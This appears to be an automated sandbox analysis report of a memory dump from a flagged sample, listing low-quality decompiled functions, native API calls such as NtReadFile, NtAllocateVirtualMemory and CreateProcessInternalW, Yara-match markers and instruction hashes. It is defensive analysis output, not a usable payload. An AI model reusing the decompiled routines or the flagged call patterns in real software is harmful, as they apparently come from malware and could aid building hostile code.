                                                          C-Code - Quality: 24%
                                                          			E004182AC(void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, char _a36, intOrPtr _a40, intOrPtr _a44) {
                                                          				intOrPtr* __esi;
                                                          				void* __ebp;
                                                          				void* _t22;
                                                          				void* _t32;
                                                          				void* _t33;
                                                          				intOrPtr* _t34;
                                                          
                                                          				if(__eflags != 0) {
                                                          					asm("in al, dx");
                                                          					_t17 = _a8;
                                                          					_t34 = _a8 + 0xc48;
                                                          					E00418DB0(_t32, _t17, _t34,  *((intOrPtr*)(_t17 + 0x10)), 0, 0x2a);
                                                          					_t6 =  &_a36; // 0x413d42
                                                          					_t12 =  &_a12; // 0x413d42
                                                          					_t22 =  *((intOrPtr*)( *_t34))( *_t12, _a16, _a20, _a24, _a28, _a32,  *_t6, _a40, _a44, _t33); // executed
                                                          					return _t22;
                                                          				} else {
                                                          					__ebp = __esp;
                                                          					__eax = _a4;
                                                          					_t14 = __eax + 0x10; // 0x300
                                                          					_t15 = __eax + 0xc4c; // 0x40972f
                                                          					__esi = _t15;
                                                          					E00418DB0(__edi, _a4, __esi,  *_t14, 0, 0x2b) =  *__esi;
                                                          					__eax =  *((intOrPtr*)( *__esi))(_a8, __ebp);
                                                          					_pop(__esi);
                                                          					__ebp = __esi;
                                                          					return  *__esi;
                                                          				}
                                                          			}









                                                          0x004182ae
                                                          0x00418262
                                                          0x00418263
                                                          0x0041826f
                                                          0x00418277
                                                          0x00418282
                                                          0x0041829d
                                                          0x004182a5
                                                          0x004182a9
                                                          0x004182b0
                                                          0x004182b1
                                                          0x004182b3
                                                          0x004182b6
                                                          0x004182bf
                                                          0x004182bf
                                                          0x004182cf
                                                          0x004182d5
                                                          0x004182d7
                                                          0x004182d8
                                                          0x004182d9
                                                          0x004182d9

                                                          APIs
                                                          • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: B=A$B=A
                                                          • API String ID: 2738559852-2767357659
                                                          • Opcode ID: 0b48b82a155b178348f88d6e01bf6d675ca2b8fa2818eeb685312e8f3d0cc14c
                                                          • Instruction ID: 196597b99329607a985bdc56155312d81ebdbcd7e96d663e18f2c25ff9a64cf5
                                                          • Opcode Fuzzy Hash: 0b48b82a155b178348f88d6e01bf6d675ca2b8fa2818eeb685312e8f3d0cc14c
                                                          • Instruction Fuzzy Hash: F9110972200204AFCB14DF99DC85EEB77A9EF8C754F158659BA1D97241CA30E911CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 21%
                                                          			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                          				void* _t18;
                                                          				void* _t27;
                                                          				void* _t28;
                                                          				intOrPtr* _t29;
                                                          
                                                          				asm("in al, dx");
                                                          				_t13 = _a4;
                                                          				_t29 = _a4 + 0xc48;
                                                          				E00418DB0(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                          				_t6 =  &_a32; // 0x413d42
                                                          				_t12 =  &_a8; // 0x413d42
                                                          				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t28); // executed
                                                          				return _t18;
                                                          			}







                                                          0x00418262
                                                          0x00418263
                                                          0x0041826f
                                                          0x00418277
                                                          0x00418282
                                                          0x0041829d
                                                          0x004182a5
                                                          0x004182a9

                                                          APIs
                                                          • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: B=A$B=A
                                                          • API String ID: 2738559852-2767357659
                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                          • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                          • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                          • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                          • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                          • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                          • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                          • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: 90b4b4d6a87fec0e3ee07628d04621249aeea7168c3680a55fd00696984ddb13
                                                          • Instruction ID: e33716c473c1a6e546ff089dea15d4fac4e1bd4e2ae9c8d374149b142e10dc26
                                                          • Opcode Fuzzy Hash: 90b4b4d6a87fec0e3ee07628d04621249aeea7168c3680a55fd00696984ddb13
                                                          • Instruction Fuzzy Hash: 1BF0F2B6200208ABCB18DF99DC95EEB77A9BF88354F15815DBE1897241C630E950CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                          • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                          • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                          • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                          • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 98eda78bfd936269705c32efd1b0d95293955e86b44c610763442b97243f8498
                                                          • Instruction ID: 7afa675b673b02d9c10c5c7b4a469065edba728a942a68cd6362ae0009e7cae1
                                                          • Opcode Fuzzy Hash: 98eda78bfd936269705c32efd1b0d95293955e86b44c610763442b97243f8498
                                                          • Instruction Fuzzy Hash: 1E9002A134100453D14061994464B460005E7E1345F51C125E2158674DC659DD567166
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: c52536cf283208c1a845e18e1f73adad6e7e8cfce60f78079f49712784bd2292
                                                          • Instruction ID: 2b65a43f706a4fd0f9a7262510380348815cd2398b9890791968c21485801c85
                                                          • Opcode Fuzzy Hash: c52536cf283208c1a845e18e1f73adad6e7e8cfce60f78079f49712784bd2292
                                                          • Instruction Fuzzy Hash: C99002B120100413D180719944547860005E7D0345F51C121A6158674EC6999ED976A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 3b486e0c29b75e9be304e1266b7ae07f61ec9e259499b749277acefe1487cc5f
                                                          • Instruction ID: 42deec972da2c15f8d4f897b7fe6ef20481a147d1f0176cd9953c093ed020c97
                                                          • Opcode Fuzzy Hash: 3b486e0c29b75e9be304e1266b7ae07f61ec9e259499b749277acefe1487cc5f
                                                          • Instruction Fuzzy Hash: 5790026160100513D14171994454656000AE7D0385F91C132A2118675ECA659A96B171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 5e7a64e927fb5520f40fd89ad305349b805e5826f7067b5c3216c0176894436c
                                                          • Instruction ID: 5a47f9cb044e60c1aca02654da8f9b9da4426b7a09d62d262c54d440b383f551
                                                          • Opcode Fuzzy Hash: 5e7a64e927fb5520f40fd89ad305349b805e5826f7067b5c3216c0176894436c
                                                          • Instruction Fuzzy Hash: 55900261242041635585B19944545474006F7E0385791C122A2508A70CC566A95AE661
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 5b29d384a32585741d6738b6cbc878baca1a929ae63e2db5fb0dddc8908595f1
                                                          • Instruction ID: c88b25a931c2b815dd07d445aba07cbd344ce50ae5af987d2bd426791e2362f9
                                                          • Opcode Fuzzy Hash: 5b29d384a32585741d6738b6cbc878baca1a929ae63e2db5fb0dddc8908595f1
                                                          • Instruction Fuzzy Hash: 2790027120100423D151619945547470009E7D0385F91C522A1518678DD6969A56B161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: f2dbddb06fd632bf857aa174052a133e4b314df82d838695a4461f2f878c2ace
                                                          • Instruction ID: d2806593074178f53cc6412f9306b404feb27101df0d506d8fefe7fa030b1c06
                                                          • Opcode Fuzzy Hash: f2dbddb06fd632bf857aa174052a133e4b314df82d838695a4461f2f878c2ace
                                                          • Instruction Fuzzy Hash: C390027120140413D1406199486474B0005E7D0346F51C121A2258675DC665995575B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: a5870aed4d3057a49a0098a40446a7cfbb868270bb8a4d9446941e4369829543
                                                          • Instruction ID: 4624bca2069c0ec68e538fccbfdb4fe85715ef84de9602b25bf44a218e2c7c5d
                                                          • Opcode Fuzzy Hash: a5870aed4d3057a49a0098a40446a7cfbb868270bb8a4d9446941e4369829543
                                                          • Instruction Fuzzy Hash: 0E90026160100053418071A988949464005FBE1355751C231A1A8C670DC599996966A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: ba573b1a56234053ac88d53a938d4b650f122984b0cc527042c6a4d7d7db56eb
                                                          • Instruction ID: 3eebff29b3af0f023c23df75e40564c35bc1eaae1695d7e01563ab612514229c
                                                          • Opcode Fuzzy Hash: ba573b1a56234053ac88d53a938d4b650f122984b0cc527042c6a4d7d7db56eb
                                                          • Instruction Fuzzy Hash: E390026121180053D24065A94C64B470005E7D0347F51C225A1248674CC95599656561
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 44dd40b4c6a28faf421c60f5ff0443ad100ea8d6443f7e8c21b37df8203535e7
                                                          • Instruction ID: 3ea5da1813235bf40c7580ac360cf4cbc5dc0457fedda215b60c13e9cb97bf31
                                                          • Opcode Fuzzy Hash: 44dd40b4c6a28faf421c60f5ff0443ad100ea8d6443f7e8c21b37df8203535e7
                                                          • Instruction Fuzzy Hash: 809002A120200013414571994464656400AE7E0345B51C131E21086B0DC56599957165
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 19b0efc2650dec37a3d2f85dff5a69ff2b4fce73daa08233951dd81f78171b9b
                                                          • Instruction ID: 29299dfcac29aa4097742638b04bcc364517a910f9f01f1018a43dc1db60c3bf
                                                          • Opcode Fuzzy Hash: 19b0efc2650dec37a3d2f85dff5a69ff2b4fce73daa08233951dd81f78171b9b
                                                          • Instruction Fuzzy Hash: 70900265211000130145A59907545470046E7D5395351C131F2109670CD66199656161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 6cf95e19430e293627cb8d84f4d5606da8917a68a27dc84348ff798fd6a62cff
                                                          • Instruction ID: dff872398bccccfba207a76b25d9026970ecab4faf1a9eb94bff26b26843e44d
                                                          • Opcode Fuzzy Hash: 6cf95e19430e293627cb8d84f4d5606da8917a68a27dc84348ff798fd6a62cff
                                                          • Instruction Fuzzy Hash: 8090026921300013D1C07199545864A0005E7D1346F91D525A1109678CC955996D6361
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 66ae5bce4efa76708f8395541c0e6ee4985f4cc8d725d1e9940850335be38502
                                                          • Instruction ID: 10b281ed22c46bf616cb560d6d2ecc58434813915b603285557414f9c050e759
                                                          • Opcode Fuzzy Hash: 66ae5bce4efa76708f8395541c0e6ee4985f4cc8d725d1e9940850335be38502
                                                          • Instruction Fuzzy Hash: C990026130100013D180719954686464005F7E1345F51D121E1508674CD955995A6262
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 4164023442c90a35cb1428a05d31b4990d135a159fb8c789b43823fe8af77053
                                                          • Instruction ID: 3b6c1bb72d6d8709df20c338acc5fcba12f466f5661e46ed504337d62b20c27a
                                                          • Opcode Fuzzy Hash: 4164023442c90a35cb1428a05d31b4990d135a159fb8c789b43823fe8af77053
                                                          • Instruction Fuzzy Hash: FF90027131114413D150619984547460005E7D1345F51C521A1918678DC6D599957162
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 399a43378fbe5e07f7ffefd8e1c7aa87748ca22a10651f96b133fc54ceb3a7cc
                                                          • Instruction ID: cd84beb7554c9e1c40576ae8c410ac660586be425b415cc51bef950274fbb5be
                                                          • Opcode Fuzzy Hash: 399a43378fbe5e07f7ffefd8e1c7aa87748ca22a10651f96b133fc54ceb3a7cc
                                                          • Instruction Fuzzy Hash: 2790027120100413D14065D954586860005E7E0345F51D121A6118675EC6A599957171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 458f5d96767a53e7ea1942a9ee3a8348478e8759d8ae68fd5ae95f856af3185a
                                                          • Instruction ID: 09443f3d446aa579babff4040b810e77652961d40106763071f8b4a5c8eff5cc
                                                          • Opcode Fuzzy Hash: 458f5d96767a53e7ea1942a9ee3a8348478e8759d8ae68fd5ae95f856af3185a
                                                          • Instruction Fuzzy Hash: 6E90027120108813D1506199845478A0005E7D0345F55C521A5518778DC6D599957161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: e1a7b479cf78c8b4ead0880cf4221bf90eff6a835feee86b8730a1856bb528fa
                                                          • Instruction ID: 39321384087a9e2a373aea05b7de92afcb47e4d012fcd715c53c19c01c0b82a7
                                                          • Opcode Fuzzy Hash: e1a7b479cf78c8b4ead0880cf4221bf90eff6a835feee86b8730a1856bb528fa
                                                          • Instruction Fuzzy Hash: 2390027120100813D1C07199445468A0005E7D1345F91C125A1119774DCA559B5D77E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                          • Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
                                                          • Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                          • Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID: hA
                                                          • API String ID: 1279760036-1221461045
                                                          • Opcode ID: 269900346b7c3cf1095cd121d9a13cafab3a846ac9cdea7f6ce23ea480356605
                                                          • Instruction ID: a92fe9ae98136920995dbb6c9f8f490c0a28fc78c4328f558ebb06bb2a3a51d6
                                                          • Opcode Fuzzy Hash: 269900346b7c3cf1095cd121d9a13cafab3a846ac9cdea7f6ce23ea480356605
                                                          • Instruction Fuzzy Hash: D1F04F763002156FDA24EF99EC84EE7736DEF88360B10855AFA4D9B201D931EA5587E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                          • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,y@,?,?,?), ref: 00418584
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CreateExitInternal
                                                          • String ID:
                                                          • API String ID: 4273315900-0
                                                          • Opcode ID: 540bfc6e7dd3a05608229c53d547d5ceb1e2f8f92c80232f9867aac60bdf6548
                                                          • Instruction ID: 90963e86cd57150ed095c23e32252a4bc52356d2fee715913416bcb79a385e3c
                                                          • Opcode Fuzzy Hash: 540bfc6e7dd3a05608229c53d547d5ceb1e2f8f92c80232f9867aac60bdf6548
                                                          • Instruction Fuzzy Hash: B60117B2200208BBCB44DF99DC80DEB77ADEF8C354F118249FA0D97241DA34E951CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                          • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                                          • Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                          • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,y@,?,?,?), ref: 00418584
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          • Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                          • Instruction ID: 513559d71bb74bdb0002c37f9039ea76381332b5628ed031e04d017542a4cadc
                                                          • Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                          • Instruction Fuzzy Hash: A3015FB2214208ABCB54DF89DC81EEB77ADAF8C754F158258BA0D97251DA30E851CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 217add93ce38b03714e6ccd2c066df5cfb3b48363690f25c7b28eacd6981adb7
                                                          • Instruction ID: c5ff80edf742f8a68fdad7a16a09cf22f23f4b8e9e8c60093caf9f0ba1e94a67
                                                          • Opcode Fuzzy Hash: 217add93ce38b03714e6ccd2c066df5cfb3b48363690f25c7b28eacd6981adb7
                                                          • Instruction Fuzzy Hash: ADE06DB1200304ABDB14DF65DC49EA7376CAF88750F114199FE085B382D531E901CBE4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                          • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                          • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                          • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                          • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                                          Uniqueness

